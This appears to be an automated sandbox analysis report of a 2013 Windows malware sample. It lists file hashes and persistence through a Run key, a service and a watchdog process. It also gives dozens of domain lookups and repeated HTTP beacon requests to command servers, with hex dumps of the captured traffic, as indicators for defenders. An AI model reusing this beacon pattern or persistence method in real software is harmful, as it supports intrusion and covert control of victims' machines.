Analysis Date2013-09-01 04:56:15
MD5a25d2a48ac46037adb2894f49c38e593
SHA1c8e17018785adb256ff75c9f34030e8c1e612a3e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 126658499327f39faa6e0165362d312d sha1: 01ddfe47f838ae52122975eba7c400b3e90ce71a size: 735744
Section.rdata md5: ba437229e6df67383b93f1bf2c81be06 sha1: 3812f08440a87aadad4fc2e50949dba427780dd5 size: 33792
Section.data md5: 8d9116d9669d60781054e2974e003ca0 sha1: 22e53e35ca90313db5276333856536e1ea02a1d1 size: 122880
Timestamp2013-07-10 22:49:49
PackerMicrosoft Visual C++ ?.?
PEhash4ad04faf000b15203941f258dfc0d59c4945458b
AVavgGeneric_r.CMW

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DF7BB4.tmp
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows Reports Discovery Extensible Files ➝
C:\WINDOWS\system32\jufnfeeowpeu.exe
Creates FileC:\WINDOWS\system32\ompybuiwku\lck
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\jufnfeeowpeu.exe
Creates File\Device\Afd\Endpoint
Creates ProcessC:\WINDOWS\system32\jufnfeeowpeu.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates ServiceLocation Remote Publication Files - C:\WINDOWS\system32\jufnfeeowpeu.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 780

Process
↳ Pid 840

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1176

Process
↳ Pid 1352

Process
↳ Pid 1832

Process
↳ Pid 1000

Process
↳ C:\WINDOWS\system32\jufnfeeowpeu.exe

Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\system32\zzsajmas.exe
Creates FileC:\WINDOWS\system32\ompybuiwku\lck
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\WINDOWS\system32\ompybuiwku\rng
Creates FileC:\WINDOWS\system32\ompybuiwku\cfg
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\ompybuiwku\run
Creates ProcessWATCHDOGPROC "c:\windows\system32\jufnfeeowpeu.exe"

Process
↳ C:\WINDOWS\system32\jufnfeeowpeu.exe

Process
↳ WATCHDOGPROC "c:\windows\system32\jufnfeeowpeu.exe"

Network Details:

DNSelementarimagine.com
Type: A
216.239.140.29
DNSthemorrefk.com
Type: A
216.55.149.9
DNSjumpgray.net
Type: A
98.139.135.22
DNSjumpgray.net
Type: A
98.139.135.21
DNSsightguide.net
Type: A
95.143.172.148
DNScaseguide.net
Type: A
141.101.114.20
DNScaseguide.net
Type: A
190.93.245.20
DNScaseguide.net
Type: A
141.101.115.20
DNScaseguide.net
Type: A
190.93.244.20
DNScaseguide.net
Type: A
190.93.246.20
DNSquickname.net
Type: A
64.95.64.190
DNSquickguide.net
Type: A
64.95.64.162
DNSdarkhalf.net
Type: A
173.236.166.37
DNScloudname.net
Type: A
84.49.232.107
DNScloudguide.net
Type: A
216.8.179.30
DNSmilkfish.net
Type: A
98.14.236.145
DNSwithwing.net
Type: A
36.3.112.226
DNSsightfish.net
Type: A
205.178.145.123
DNSheadwing.net
Type: A
199.34.228.100
DNSmojoguia.com
Type: A
DNSpengthecon.com
Type: A
DNStablewash.net
Type: A
DNSsalthave.net
Type: A
DNSyourenjoy.net
Type: A
DNSlookloss.net
Type: A
DNSsouthabout.net
Type: A
DNSliarshot.net
Type: A
DNSableeach.net
Type: A
DNSmovegray.net
Type: A
DNSwithname.net
Type: A
DNSdutyname.net
Type: A
DNSwithguide.net
Type: A
DNSdutyguide.net
Type: A
DNSwithlate.net
Type: A
DNSdutylate.net
Type: A
DNSthesehalf.net
Type: A
DNSsighthalf.net
Type: A
DNSthesename.net
Type: A
DNSsightname.net
Type: A
DNStheseguide.net
Type: A
DNStheselate.net
Type: A
DNSsightlate.net
Type: A
DNScasehalf.net
Type: A
DNSheadhalf.net
Type: A
DNScasename.net
Type: A
DNSheadname.net
Type: A
DNSheadguide.net
Type: A
DNScaselate.net
Type: A
DNSheadlate.net
Type: A
DNSquickhalf.net
Type: A
DNSthenhalf.net
Type: A
DNSthenname.net
Type: A
DNSthenguide.net
Type: A
DNSquicklate.net
Type: A
DNSthenlate.net
Type: A
DNSsundayhalf.net
Type: A
DNSmosthalf.net
Type: A
DNSsundayname.net
Type: A
DNSmostname.net
Type: A
DNSsundayguide.net
Type: A
DNSmostguide.net
Type: A
DNSsundaylate.net
Type: A
DNSmostlate.net
Type: A
DNSmeathalf.net
Type: A
DNSsickhalf.net
Type: A
DNSmeatname.net
Type: A
DNSsickname.net
Type: A
DNSmeatguide.net
Type: A
DNSsickguide.net
Type: A
DNSmeatlate.net
Type: A
DNSsicklate.net
Type: A
DNScloudhalf.net
Type: A
DNSdarkname.net
Type: A
DNSdarkguide.net
Type: A
DNScloudlate.net
Type: A
DNSdarklate.net
Type: A
DNSmilkwing.net
Type: A
DNStriedwing.net
Type: A
DNSmilkpast.net
Type: A
DNStriedpast.net
Type: A
DNSmilklady.net
Type: A
DNStriedlady.net
Type: A
DNStriedfish.net
Type: A
DNSdutywing.net
Type: A
DNSwithpast.net
Type: A
DNSdutypast.net
Type: A
DNSwithlady.net
Type: A
DNSdutylady.net
Type: A
DNSwithfish.net
Type: A
DNSdutyfish.net
Type: A
DNSthesewing.net
Type: A
DNSsightwing.net
Type: A
DNSthesepast.net
Type: A
DNSsightpast.net
Type: A
DNStheselady.net
Type: A
DNSsightlady.net
Type: A
DNSthesefish.net
Type: A
DNScasewing.net
Type: A
DNScasepast.net
Type: A
DNSheadpast.net
Type: A
DNScaselady.net
Type: A
DNSheadlady.net
Type: A
DNScasefish.net
Type: A
HTTP GEThttp://elementarimagine.com/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://themorrefk.com/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://jumpgray.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://sightguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://caseguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://quickname.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://quickguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://darkhalf.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://cloudname.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://cloudguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://milkfish.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://withwing.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://sightfish.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://headwing.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 216.239.140.29:80
Flows TCP192.168.1.1:1032 ➝ 216.55.149.9:80
Flows TCP192.168.1.1:1033 ➝ 98.139.135.22:80
Flows TCP192.168.1.1:1034 ➝ 95.143.172.148:80
Flows TCP192.168.1.1:1035 ➝ 141.101.114.20:80
Flows TCP192.168.1.1:1036 ➝ 64.95.64.190:80
Flows TCP192.168.1.1:1037 ➝ 64.95.64.162:80
Flows TCP192.168.1.1:1038 ➝ 173.236.166.37:80
Flows TCP192.168.1.1:1039 ➝ 84.49.232.107:80
Flows TCP192.168.1.1:1040 ➝ 216.8.179.30:80
Flows TCP192.168.1.1:1041 ➝ 98.14.236.145:80
Flows TCP192.168.1.1:1042 ➝ 36.3.112.226:80
Flows TCP192.168.1.1:1043 ➝ 205.178.145.123:80
Flows TCP192.168.1.1:1044 ➝ 199.34.228.100:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20656c 656d656e 74617269 6d616769   : elementarimagi
0x000000a0 (00160)   6e652e63 6f6d0d0a 0d0a                ne.com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207468 656d6f72 7265666b 2e636f6d   : themorrefk.com
0x000000a0 (00160)   0d0a0d0a 6f6d0d0a 0d0a                ....om....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206a75 6d706772 61792e6e 65740d0a   : jumpgray.net..
0x000000a0 (00160)   0d0a3034 204e6f74 20466f75 6e643c2f   ..04 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207369 67687467 75696465 2e6e6574   : sightguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206361 73656775 6964652e 6e65740d   : caseguide.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207175 69636b6e 616d652e 6e65740d   : quickname.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207175 69636b67 75696465 2e6e6574   : quickguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206461 726b6861 6c662e6e 65740d0a   : darkhalf.net..
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20636c 6f75646e 616d652e 6e65740d   : cloudname.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20636c 6f756467 75696465 2e6e6574   : cloudguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
